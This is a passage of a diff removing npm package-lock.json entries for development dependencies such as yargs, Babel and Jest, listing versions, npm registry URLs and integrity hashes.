}, - "node_modules/write-file-atomic": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-4.0.2.tgz", - "integrity": "sha512-7KxauUdBmSdWnmpaGFg+ppNjKF8uNLry8LyzjauQDOVONfFLNKrKvQOxZ/VuTIcS/gge/YNahf5RIIQWTSarlg==", - "dev": true, - "dependencies": { - "imurmurhash": "^0.1.4", - "signal-exit": "^3.0.7" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || >=16.0.0" - } - }, - "node_modules/y18n": { - "version": "5.0.8", - "resolved": "https://registry.npmjs.org/y18n/-/y18n-5.0.8.tgz", - "integrity": "sha512-0pfFzegeDWJHJIAmTLRP2DwHjdF5s7jo9tuztdQxAhINCdvS+3nGINqPd00AphqJR/0LhANUS6/+7SCb98YOfA==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/yallist": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-3.1.1.tgz", - "integrity": "sha512-a4UGQaWPH59mOXUYnAG2ewncQS4i4F43Tv3JoAM+s2VDAmS9NsK8GpDMLrCHPksFT7h3K6TOoUNn2pb7RoXx4g==", - "dev": true - }, - "node_modules/yargs": { - "version": "17.7.2", - "resolved": "https://registry.npmjs.org/yargs/-/yargs-17.7.2.tgz", - "integrity": "sha512-7dSzzRQ++CKnNI/krKnYRV7JKKPUXMEh61soaHKg9mrWEhzFWhFnxPxGl+69cD1Ou63C13NUPCnmIcrvqCuM6w==", - "dev": true, - "dependencies": { - "cliui": "^8.0.1", - "escalade": "^3.1.1", - "get-caller-file": "^2.0.5", - "require-directory": "^2.1.1", - "string-width": "^4.2.3", - "y18n": "^5.0.5", - "yargs-parser": "^21.1.1" - }, - "engines": { - "node": ">=12" - } - }, - "node_modules/yargs-parser": { - "version": "21.1.1", - "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz", - "integrity": "sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw==", - "dev": true, - "engines": { - "node": ">=12" - } - }, - "node_modules/yocto-queue": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/yocto-queue/-/yocto-queue-0.1.0.tgz", - "integrity": "sha512-rVksvsnNCdJ/ohGc6xgPwyN8eheCxsiLM8mxuE/t/mOVqJewPuO1miLpTHQiRgTKCLexL4MeAFVagts7HmNZ2Q==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - } - }, - "dependencies": { - "@ampproject/remapping": { - "version": "2.2.1", - "resolved": "https://registry.npmjs.org/@ampproject/remapping/-/remapping-2.2.1.tgz", - "integrity": "sha512-lFMjJTrFL3j7L9yBxwYfCq2k6qqwHyzuUl/XBnif78PWTJYyL/dfowQHWE3sp6U6ZzqWiiIZnpTMO96zhkjwtg==", - "dev": true, - "requires": { - "@jridgewell/gen-mapping": "^0.3.0", - "@jridgewell/trace-mapping": "^0.3.9" - } - }, - "@babel/code-frame": { - "version": "7.22.13", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.22.13.tgz", - "integrity": "sha512-XktuhWlJ5g+3TJXc5upd9Ks1HutSArik6jf2eAjYFyIOf4ej3RN+184cZbzDvbPnuTJIUhPKKJE3cIsYTiAT3w==", - "dev": true, - "requires": { - "@babel/highlight": "^7.22.13", - "chalk": "^2.4.2" - }, - "dependencies": { - "ansi-styles": { - "version": "3.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", - "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", - "dev": true, - "requires": { - "color-convert": "^1.9.0" - } - }, - "chalk": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", - "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", - "dev": true, - "requires": { - "ansi-styles": "^3.2.1", - "escape-string-regexp": "^1.0.5", - "supports-color": "^5.3.0" - } - }, - "color-convert": { - "version": "1.9.3", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", - "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", - "dev": true, - "requires": { - "color-name": "1.1.3" - } - }, - "color-name": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", - "integrity": "sha512-72fSenhMw2HZMTVHeCA9KCmpEIbzWiQsjN+BHcBbS9vr1mtt+vJjPdksIBNUmKAW8TFUDPJK5SUU3QhE9NEXDw==", - "dev": true - }, - "escape-string-regexp": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", - "integrity": "sha512-vbRorB5FUQWvla16U8R/qgaFIya2qGzwDrNmCZuYKrbdSUMG6I1ZCGQRefkRVhuOkIGVne7BQ35DSfo1qvJqFg==", - "dev": true - }, - "has-flag": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", - "integrity": "sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==", - "dev": true - }, - "supports-color": { - "version": "5.5.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", - "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", - "dev": true, - "requires": { - "has-flag": "^3.0.0" - } - } - } - }, - "@babel/compat-data": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/compat-data/-/compat-data-7.22.6.tgz", - "integrity": "sha512-29tfsWTq2Ftu7MXmimyC0C5FDZv5DYxOZkh3XD3+QW4V/BYuv/LyEsjj3c0hqedEaDt6DBfDvexMKU8YevdqFg==", - "dev": true - }, - "@babel/core": { - "version": "7.22.8", - "resolved": "https://registry.npmjs.org/@babel/core/-/core-7.22.8.tgz", - "integrity": "sha512-75+KxFB4CZqYRXjx4NlR4J7yGvKumBuZTmV4NV6v09dVXXkuYVYLT68N6HCzLvfJ+fWCxQsntNzKwwIXL4bHnw==", - "dev": true, - "requires": { - "@ampproject/remapping": "^2.2.0", - "@babel/code-frame": "^7.22.5", - "@babel/generator": "^7.22.7", - "@babel/helper-compilation-targets": "^7.22.6", - "@babel/helper-module-transforms": "^7.22.5", - "@babel/helpers": "^7.22.6", - "@babel/parser": "^7.22.7", - "@babel/template": "^7.22.5", - "@babel/traverse": "^7.22.8", - "@babel/types": "^7.22.5", - "@nicolo-ribaudo/semver-v6": "^6.3.3", - "convert-source-map": "^1.7.0", - "debug": "^4.1.0", - "gensync": "^1.0.0-beta.2", - "json5": "^2.2.2" - }, - "dependencies": { - "convert-source-map": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.9.0.tgz", - "integrity": "sha512-ASFBup0Mz1uyiIjANan1jzLQami9z1PoYSZCiiYW2FczPbenXc45FZdBZLzOT+r6+iciuEModtmCti+hjaAk0A==", - "dev": true - } - } - }, - "@babel/generator": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/generator/-/generator-7.23.0.tgz", - "integrity": "sha512-lN85QRR+5IbYrMWM6Y4pE/noaQtg4pNiqeNGX60eqOfo6gtEj6uw/JagelB8vVztSd7R6M5n1+PQkDbHbBRU4g==", - "dev": true, - "requires": { - "@babel/types": "^7.23.0", - "@jridgewell/gen-mapping": "^0.3.2", - "@jridgewell/trace-mapping": "^0.3.17", - "jsesc": "^2.5.1" - } - }, - "@babel/helper-compilation-targets": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helper-compilation-targets/-/helper-compilation-targets-7.22.6.tgz", - "integrity": "sha512-534sYEqWD9VfUm3IPn2SLcH4Q3P86XL+QvqdC7ZsFrzyyPF3T4XGiVghF6PTYNdWg6pXuoqXxNQAhbYeEInTzA==", - "dev": true, - "requires": { - "@babel/compat-data": "^7.22.6", - "@babel/helper-validator-option": "^7.22.5", - "@nicolo-ribaudo/semver-v6": "^6.3.3", - "browserslist": "^4.21.9", - "lru-cache": "^5.1.1" - } - }, - "@babel/helper-environment-visitor": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/helper-environment-visitor/-/helper-environment-visitor-7.22.20.tgz", - "integrity": "sha512-zfedSIzFhat/gFhWfHtgWvlec0nqB9YEIVrpuwjruLlXfUSnA8cJB0miHKwqDnQ7d32aKo2xt88/xZptwxbfhA==", - "dev": true - }, - "@babel/helper-function-name": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/helper-function-name/-/helper-function-name-7.23.0.tgz", - "integrity": "sha512-OErEqsrxjZTJciZ4Oo+eoZqeW9UIiOcuYKRJA4ZAgV9myA+pOXhhmpfNCKjEH/auVfEYVFJ6y1Tc4r0eIApqiw==", - "dev": true, - "requires": { - "@babel/template": "^7.22.15", - "@babel/types": "^7.23.0" - } - }, - "@babel/helper-hoist-variables": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-hoist-variables/-/helper-hoist-variables-7.22.5.tgz", - "integrity": "sha512-wGjk9QZVzvknA6yKIUURb8zY3grXCcOZt+/7Wcy8O2uctxhplmUPkOdlgoNhmdVee2c92JXbf1xpMtVNbfoxRw==", - "dev": true, - "requires": { - "@babel/types": "^7.22.5" - } - }, - "@babel/helper-module-imports": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-module-imports/-/helper-module-imports-7.22.5.tgz", - "integrity": "sha512-8Dl6+HD/cKifutF5qGd/8ZJi84QeAKh+CEe1sBzz8UayBBGg1dAIJrdHOcOM5b2MpzWL2yuotJTtGjETq0qjXg==", - "dev": true, - "requires": { - "@babel/types": "^7.22.5" - } - }, - "@babel/helper-module-transforms": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-module-transforms/-/helper-module-transforms-7.22.5.tgz", - "integrity": "sha512-+hGKDt/Ze8GFExiVHno/2dvG5IdstpzCq0y4Qc9OJ25D4q3pKfiIP/4Vp3/JvhDkLKsDK2api3q3fpIgiIF5bw==", - "dev": true, - "requires": { - "@babel/helper-environment-visitor": "^7.22.5", - "@babel/helper-module-imports": "^7.22.5", - "@babel/helper-simple-access": "^7.22.5", - "@babel/helper-split-export-declaration": "^7.22.5", - "@babel/helper-validator-identifier": "^7.22.5", - "@babel/template": "^7.22.5", - "@babel/traverse": "^7.22.5", - "@babel/types": "^7.22.5" - } - }, - "@babel/helper-plugin-utils": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-plugin-utils/-/helper-plugin-utils-7.22.5.tgz", - "integrity": "sha512-uLls06UVKgFG9QD4OeFYLEGteMIAa5kpTPcFL28yuCIIzsf6ZyKZMllKVOCZFhiZ5ptnwX4mtKdWCBE/uT4amg==", - "dev": true - }, - "@babel/helper-simple-access": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-simple-access/-/helper-simple-access-7.22.5.tgz", - "integrity": "sha512-n0H99E/K+Bika3++WNL17POvo4rKWZ7lZEp1Q+fStVbUi8nxPQEBOlTmCOxW/0JsS56SKKQ+ojAe2pHKJHN35w==", - "dev": true, - "requires": { - "@babel/types": "^7.22.5" - } - }, - "@babel/helper-split-export-declaration": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helper-split-export-declaration/-/helper-split-export-declaration-7.22.6.tgz", - "integrity": "sha512-AsUnxuLhRYsisFiaJwvp1QF+I3KjD5FOxut14q/GzovUe6orHLesW2C7d754kRm53h5gqrz6sFl6sxc4BVtE/g==", - "dev": true, - "requires": { - "@babel/types": "^7.22.5" - } - }, - "@babel/helper-string-parser": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-string-parser/-/helper-string-parser-7.22.5.tgz", - "integrity": "sha512-mM4COjgZox8U+JcXQwPijIZLElkgEpO5rsERVDJTc2qfCDfERyob6k5WegS14SX18IIjv+XD+GrqNumY5JRCDw==", - "dev": true - }, - "@babel/helper-validator-identifier": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.22.20.tgz", - "integrity": "sha512-Y4OZ+ytlatR8AI+8KZfKuL5urKp7qey08ha31L8b3BwewJAoJamTzyvxPR/5D+KkdJCGPq/+8TukHBlY10FX9A==", - "dev": true - }, - "@babel/helper-validator-option": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-option/-/helper-validator-option-7.22.5.tgz", - "integrity": "sha512-R3oB6xlIVKUnxNUxbmgq7pKjxpru24zlimpE8WK47fACIlM0II/Hm1RS8IaOI7NgCr6LNS+jl5l75m20npAziw==", - "dev": true - }, - "@babel/helpers": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helpers/-/helpers-7.22.6.tgz", - "integrity": "sha512-YjDs6y/fVOYFV8hAf1rxd1QvR9wJe1pDBZ2AREKq/SDayfPzgk0PBnVuTCE5X1acEpMMNOVUqoe+OwiZGJ+OaA==", - "dev": true, - "requires": { - "@babel/template": "^7.22.5", - "@babel/traverse": "^7.22.6", - "@babel/types": "^7.22.5" - } - }, - "@babel/highlight": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/highlight/-/highlight-7.22.20.tgz", - "integrity": "sha512-dkdMCN3py0+ksCgYmGG8jKeGA/8Tk+gJwSYYlFGxG5lmhfKNoAy004YpLxpS1W2J8m/EK2Ew+yOs9pVRwO89mg==", - "dev": true, - "requires": { - "@babel/helper-validator-identifier": "^7.22.20", - "chalk": "^2.4.2", - "js-tokens": "^4.0.0" - }, - "dependencies": { - "ansi-styles": { - "version": "3.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", - "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", - "dev": true, - "requires": { - "color-convert": "^1.9.0" - } - }, - "chalk": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", - "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", - "dev": true, - "requires": { - "ansi-styles": "^3.2.1", - "escape-string-regexp": "^1.0.5", - "supports-color": "^5.3.0" - } - }, - "color-convert": { - "version": "1.9.3", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", - "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", - "dev": true, - "requires": { - "color-name": "1.1.3" - } - }, - "color-name": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", - "integrity": "sha512-72fSenhMw2HZMTVHeCA9KCmpEIbzWiQsjN+BHcBbS9vr1mtt+vJjPdksIBNUmKAW8TFUDPJK5SUU3QhE9NEXDw==", - "dev": true - }, - "escape-string-regexp": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", - "integrity": "sha512-vbRorB5FUQWvla16U8R/qgaFIya2qGzwDrNmCZuYKrbdSUMG6I1ZCGQRefkRVhuOkIGVne7BQ35DSfo1qvJqFg==", - "dev": true - }, - "has-flag": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", - "integrity": "sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==", - "dev": true - }, - "supports-color": { - "version": "5.5.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", - "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", - "dev": true, - "requires": { - "has-flag": "^3.0.0" - } - } - } - }, - "@babel/parser": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.23.0.tgz", - "integrity": "sha512-vvPKKdMemU85V9WE/l5wZEmImpCtLqbnTvqDS2U1fJ96KrxoW7KrXhNsNCblQlg8Ck4b85yxdTyelsMUgFUXiw==", - "dev": true - }, - "@babel/plugin-syntax-async-generators": { - "version": "7.8.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-async-generators/-/plugin-syntax-async-generators-7.8.4.tgz", - "integrity": "sha512-tycmZxkGfZaxhMRbXlPXuVFpdWlXpir2W4AMhSJgRKzk/eDlIXOhb2LHWoLpDF7TEHylV5zNhykX6KAgHJmTNw==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-bigint": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-bigint/-/plugin-syntax-bigint-7.8.3.tgz", - "integrity": "sha512-wnTnFlG+YxQm3vDxpGE57Pj0srRU4sHE/mDkt1qv2YJJSeUAec2ma4WLUnUPeKjyrfntVwe/N6dCXpU+zL3Npg==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-class-properties": { - "version": "7.12.13", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-class-properties/-/plugin-syntax-class-properties-7.12.13.tgz", - "integrity": "sha512-fm4idjKla0YahUNgFNLCB0qySdsoPiZP3iQE3rky0mBUtMZ23yDJ9SJdg6dXTSDnulOVqiF3Hgr9nbXvXTQZYA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.12.13" - } - }, - "@babel/plugin-syntax-import-meta": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-import-meta/-/plugin-syntax-import-meta-7.10.4.tgz", - "integrity": "sha512-Yqfm+XDx0+Prh3VSeEQCPU81yC+JWZ2pDPFSS4ZdpfZhp4MkFMaDC1UqseovEKwSUpnIL7+vK+Clp7bfh0iD7g==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-json-strings": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-json-strings/-/plugin-syntax-json-strings-7.8.3.tgz", - "integrity": "sha512-lY6kdGpWHvjoe2vk4WrAapEuBR69EMxZl+RoGRhrFGNYVK8mOPAW8VfbT/ZgrFbXlDNiiaxQnAtgVCZ6jv30EA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-jsx": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-jsx/-/plugin-syntax-jsx-7.22.5.tgz", - "integrity": "sha512-gvyP4hZrgrs/wWMaocvxZ44Hw0b3W8Pe+cMxc8V1ULQ07oh8VNbIRaoD1LRZVTvD+0nieDKjfgKg89sD7rrKrg==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.22.5" - } - }, - "@babel/plugin-syntax-logical-assignment-operators": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-logical-assignment-operators/-/plugin-syntax-logical-assignment-operators-7.10.4.tgz", - "integrity": "sha512-d8waShlpFDinQ5MtvGU9xDAOzKH47+FFoney2baFIoMr952hKOLp1HR7VszoZvOsV/4+RRszNY7D17ba0te0ig==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-nullish-coalescing-operator": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-nullish-coalescing-operator/-/plugin-syntax-nullish-coalescing-operator-7.8.3.tgz", - "integrity": "sha512-aSff4zPII1u2QD7y+F8oDsz19ew4IGEJg9SVW+bqwpwtfFleiQDMdzA/R+UlWDzfnHFCxxleFT0PMIrR36XLNQ==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-numeric-separator": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-numeric-separator/-/plugin-syntax-numeric-separator-7.10.4.tgz", - "integrity": "sha512-9H6YdfkcK/uOnY/K7/aA2xpzaAgkQn37yzWUMRK7OaPOqOpGS1+n0H5hxT9AUw9EsSjPW8SVyMJwYRtWs3X3ug==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-object-rest-spread": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-object-rest-spread/-/plugin-syntax-object-rest-spread-7.8.3.tgz", - "integrity": "sha512-XoqMijGZb9y3y2XskN+P1wUGiVwWZ5JmoDRwx5+3GmEplNyVM2s2Dg8ILFQm8rWM48orGy5YpI5Bl8U1y7ydlA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-optional-catch-binding": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-catch-binding/-/plugin-syntax-optional-catch-binding-7.8.3.tgz", - "integrity": "sha512-6VPD0Pc1lpTqw0aKoeRTMiB+kWhAoT24PA+ksWSBrFtl5SIRVpZlwN3NNPQjehA2E/91FV3RjLWoVTglWcSV3Q==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-optional-chaining": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-chaining/-/plugin-syntax-optional-chaining-7.8.3.tgz", - "integrity": "sha512-KoK9ErH1MBlCPxV0VANkXW2/dw4vlbGDrFgz8bmUsBGYkFRcbRwMh6cIJubdPrkxRwuGdtCk0v/wPTKbQgBjkg==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-top-level-await": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-top-level-await/-/plugin-syntax-top-level-await-7.14.5.tgz", - "integrity": "sha512-hx++upLv5U1rgYfwe1xBQUhRmU41NEvpUvrp8jkrSCdvGSnM5/qdRMtylJ6PG5OFkBaHkbTAKTnd3/YyESRHFw==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.14.5" - } - }, - "@babel/plugin-syntax-typescript": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-typescript/-/plugin-syntax-typescript-7.22.5.tgz", - "integrity": "sha512-1mS2o03i7t1c6VzH6fdQ3OA8tcEIxwG18zIPRp+UY1Ihv6W+XZzBCVxExF9upussPXJ0xE9XRHwMoNs1ep/nRQ==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.22.5" - } - }, - "@babel/template": { - "version": "7.22.15", - "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.22.15.tgz", - "integrity": "sha512-QPErUVm4uyJa60rkI73qneDacvdvzxshT3kksGqlGWYdOTIUOwJ7RDUL8sGqslY1uXWSL6xMFKEXDS3ox2uF0w==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.22.13", - "@babel/parser": "^7.22.15", - "@babel/types": "^7.22.15" - } - }, - "@babel/traverse": { - "version": "7.23.2", - "resolved": "https://registry.npmjs.org/@babel/traverse/-/traverse-7.23.2.tgz", - "integrity": "sha512-azpe59SQ48qG6nu2CzcMLbxUudtN+dOM9kDbUqGq3HXUJRlo7i8fvPoxQUzYgLZ4cMVmuZgm8vvBpNeRhd6XSw==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.22.13", - "@babel/generator": "^7.23.0", - "@babel/helper-environment-visitor": "^7.22.20", - "@babel/helper-function-name": "^7.23.0", - "@babel/helper-hoist-variables": "^7.22.5", - "@babel/helper-split-export-declaration": "^7.22.6", - "@babel/parser": "^7.23.0", - "@babel/types": "^7.23.0", - "debug": "^4.1.0", - "globals": "^11.1.0" - } - }, - "@babel/types": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/types/-/types-7.23.0.tgz", - "integrity": "sha512-0oIyUfKoI3mSqMvsxBdclDwxXKXAUA8v/apZbc+iSyARYou1o8ZGDxbUYyLFoW2arqS2jDGqJuZvv1d/io1axg==", - "dev": true, - "requires": { - "@babel/helper-string-parser": "^7.22.5", - "@babel/helper-validator-identifier": "^7.22.20", - "to-fast-properties": "^2.0.0" - } - }, - "@bcoe/v8-coverage": { - "version": "0.2.3", - "resolved": "https://registry.npmjs.org/@bcoe/v8-coverage/-/v8-coverage-0.2.3.tgz", - "integrity": "sha512-0hYQ8SB4Db5zvZB4axdMHGwEaQjkZzFjQiN9LVYvIFB2nSUHW9tYpxWriPrWDASIxiaXax83REcLxuSdnGPZtw==", - "dev": true - }, - "@istanbuljs/load-nyc-config": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/@istanbuljs/load-nyc-config/-/load-nyc-config-1.1.0.tgz", - "integrity": "sha512-VjeHSlIzpv/NyD3N0YuHfXOPDIixcA1q2ZV98wsMqcYlPmv2n3Yb2lYP9XMElnaFVXg5A7YLTeLu6V84uQDjmQ==", - "dev": true, - "requires": { - "camelcase": "^5.3.1", - "find-up": "^4.1.0", - "get-package-type": "^0.1.0", - "js-yaml": "^3.13.1", - "resolve-from": "^5.0.0" - } - }, - "@istanbuljs/schema": { - "version": "0.1.3", - "resolved": "https://registry.npmjs.org/@istanbuljs/schema/-/schema-0.1.3.tgz", - "integrity": "sha512-ZXRY4jNvVgSVQ8DL3LTcakaAtXwTVUxE81hslsyD2AtoXW/wVob10HkOJ1X/pAlcI7D+2YoZKg5do8G/w6RYgA==", - "dev": true - }, - "@jest/console": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/console/-/console-29.6.1.tgz", - "integrity": "sha512-Aj772AYgwTSr5w8qnyoJ0eDYvN6bMsH3ORH1ivMotrInHLKdUz6BDlaEXHdM6kODaBIkNIyQGzsMvRdOv7VG7Q==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1", - "slash": "^3.0.0" - } - }, - "@jest/core": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/core/-/core-29.6.1.tgz", - "integrity": "sha512-CcowHypRSm5oYQ1obz1wfvkjZZ2qoQlrKKvlfPwh5jUXVU12TWr2qMeH8chLMuTFzHh5a1g2yaqlqDICbr+ukQ==", - "dev": true, - "requires": { - "@jest/console": "^29.6.1", - "@jest/reporters": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "jest-changed-files": "^29.5.0", - "jest-config": "^29.6.1", - "jest-haste-map": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-regex-util": "^29.4.3", - "jest-resolve": "^29.6.1", - "jest-resolve-dependencies": "^29.6.1", - "jest-runner": "^29.6.1", - "jest-runtime": "^29.6.1", - "jest-snapshot": "^29.6.1", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "jest-watcher": "^29.6.1", - "micromatch": "^4.0.4", - "pretty-format": "^29.6.1", - "slash": "^3.0.0", - "strip-ansi": "^6.0.0" - } - }, - "@jest/environment": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/environment/-/environment-29.6.1.tgz", - "integrity": "sha512-RMMXx4ws+Gbvw3DfLSuo2cfQlK7IwGbpuEWXCqyYDcqYTI+9Ju3a5hDnXaxjNsa6uKh9PQF2v+qg+RLe63tz5A==", - "dev": true, - "requires": { - "@jest/fake-timers": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "jest-mock": "^29.6.1" - } - }, - "@jest/expect": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/expect/-/expect-29.6.1.tgz", - "integrity": "sha512-N5xlPrAYaRNyFgVf2s9Uyyvr795jnB6rObuPx4QFvNJz8aAjpZUDfO4bh5G/xuplMID8PrnuF1+SfSyDxhsgYg==", - "dev": true, - "requires": { - "expect": "^29.6.1", - "jest-snapshot": "^29.6.1" - } - }, - "@jest/expect-utils": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-29.6.1.tgz", - "integrity": "sha512-o319vIf5pEMx0LmzSxxkYYxo4wrRLKHq9dP1yJU7FoPTB0LfAKSz8SWD6D/6U3v/O52t9cF5t+MeJiRsfk7zMw==", - "dev": true, - "requires": { - "jest-get-type": "^29.4.3" - } - }, - "@jest/fake-timers": { - "version": "29.6.1", - "resolved": 